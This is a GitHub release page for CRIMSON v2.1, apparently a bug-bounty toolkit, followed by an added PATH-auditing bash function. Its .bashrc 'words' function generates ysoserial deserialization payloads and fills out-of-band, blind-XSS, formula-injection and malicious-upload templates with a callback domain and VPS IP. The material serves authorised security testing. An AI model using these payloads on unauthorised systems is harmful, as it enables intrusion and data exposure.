Release CRIMSON v2.1 · Karmaz95/crimson · GitHub

CRIMSON v2.1

@Karmaz95 Karmaz95 released this 31 Jan 21:54
· 185 commits to master since this release

CHANGES:

  1. Narrowed down the "OR" (Open Redirection) list.
  2. Open Redirection testing is now only possible with the "-x" flag.
    • This is because Burp Suite will find most OR vulns.
  3. GOAST: small code changes, bugs patched and concurrency added.
  4. The HBH testing function was removed from the default crimson_target workflow.
    • You can add those functions manually if you want.
  5. get_the_robots() output bug patched.
  6. Removed crimson_deserializator from the crimson_exploit workflow.
  7. Removed the codeql function; if you want to use it, you have to add it to the workflow manually.
  8. No more prompt after the first run of the CMSEEK Docker container.
  9. New aliases in .bashrc.
  10. Preinstalled fd and batcat.

Addition in .bashrc:

### WORKING PATH
# No trailing ":" here: an empty PATH entry makes the shell search the current directory
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/go/bin:/root/go/bin:/root/tools/codeql:/root/tools/CRIMSON"
### PYTHON ALIAS
alias python="python2"
### CARGO
. /root/.cargo/env
### CRIMSON MANUAL - words [domain] [vps_ip] [port]
function words {
    if [ "$#" -ne 3 ]; then
        echo "usage: words [domain] [vps_ip] [port]" >&2
        return 1
    fi
    # Java deserialization payload URLDNS (* swap the java path if it does not work)
    java -jar /root/tools/CRIMSON/scripts/GOAST/ysoserial.jar URLDNS "http://$1" | base64 -w0 | sed "s/$/\n/g" > oob.fuzz
    # Preparing the OOB payload list: substitute the collaborator domain, VPS IP and port
    sed "s/domain_collab/$1/g; s/vps_ip/$2/g" /root/tools/CRIMSON/words/exp/OOB > oob.fuzz1
    sed "s/$2:80/$2:$3/g" oob.fuzz1 >> oob.fuzz && rm oob.fuzz1
    sed "s/domain_collab/$1/g" /root/tools/CRIMSON/words/exp/BLIND_XSS >> oob.fuzz
    # Preparing other wordlists and files to upload
    cat /root/tools/CRIMSON/words/bug >> bug.fuzz
    sed "s/domain_collab/$1/g" /root/tools/CRIMSON/words/exp/http_leaks >> http_leaks
    cat /root/tools/CRIMSON/words/exp/bypass_ext >> bypass_ext
    sed "s/domain_collab/$1/g" /root/tools/CRIMSON/words/exp/BLIND_XSS >> BLIND_XSS
    sed "s/domain_collab/$1/g" /root/tools/CRIMSON/words/exp/headers >> headers.fuzz
    # Preparing upload (stop here if the directory cannot be created or entered)
    mkdir -p upload && cd upload || return 1
    cp /root/tools/CRIMSON/upload/* .
    sed "s/domain_collab/$1/g" exiftool.jpg > exiftooldomain.jpg
    sed "s/domain_collab/$2:$3/g" exiftool.jpg > exiftoolvps.jpg
    sed "s/domain_collab/$1/g; s/vps_ip/$2/g" formula_injections.txt > formula_injections1
    sed "s/$2:80/$2:$3/g" formula_injections1 >> formula_injections.txt && rm formula_injections1
    cd ..
}
### FEROX ALIAS
alias ferox="feroxbuster --extract-links --no-recursion --redirects --wordlist /root/tools/CRIMSON/words/dir -k -u"
### fdfind alias
alias fd="fdfind"
### batcat
alias bat="batcat"
### CD TO CRIMSON
alias crimson="cd /root/tools/CRIMSON"
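A PATH export like the one above is easy to get wrong: an empty entry (a trailing or doubled ":"), a relative entry, or a world-writable directory lets a file in a directory someone else controls shadow a system binary. The following audit function is an added example, not part of the CRIMSON repository; the sample PATH string it checks is constructed here and modelled on the export above.

```bash
#!/usr/bin/env bash
# Added example, not part of the CRIMSON repository: audit a PATH string for
# entries that let a directory an attacker can write to shadow system binaries.
# Flags: empty entries (a trailing or doubled ':' makes the shell search the
# current directory), '.'/'..', relative entries, and world-writable directories.
# Exit status is the number of findings (0 = clean); one line per finding on stdout.

audit_path() {
    local rest="$1:" entry problems=0   # trailing ':' so the last field is processed too
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        if [ -z "$entry" ] || [ "$entry" = . ] || [ "$entry" = .. ]; then
            echo "CWD-SEARCHED: empty or '$entry' entry (shell will look in the current directory)"
            problems=$((problems + 1))
        elif [ "${entry#/}" = "$entry" ]; then
            echo "RELATIVE: '$entry' resolves differently in every working directory"
            problems=$((problems + 1))
        elif [ ! -d "$entry" ]; then
            # Not counted: a missing directory is only a risk if its parent is writable
            echo "MISSING: '$entry' does not exist (verify the parent directory's permissions)"
        elif find -H "$entry" -maxdepth 0 -perm -0002 2>/dev/null | grep -q .; then
            echo "WORLD-WRITABLE: '$entry' (any local user can place a binary here)"
            problems=$((problems + 1))
        fi
    done
    return "$problems"
}

# Constructed sample modelled on the export above; note the empty entry left by the final ':'.
SAMPLE_PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/go/bin:/root/go/bin:"
audit_path "$SAMPLE_PATH" || echo "findings: $?"
```

Run it against the live environment with `audit_path "$PATH"`; a non-zero exit status means at least one entry needs attention.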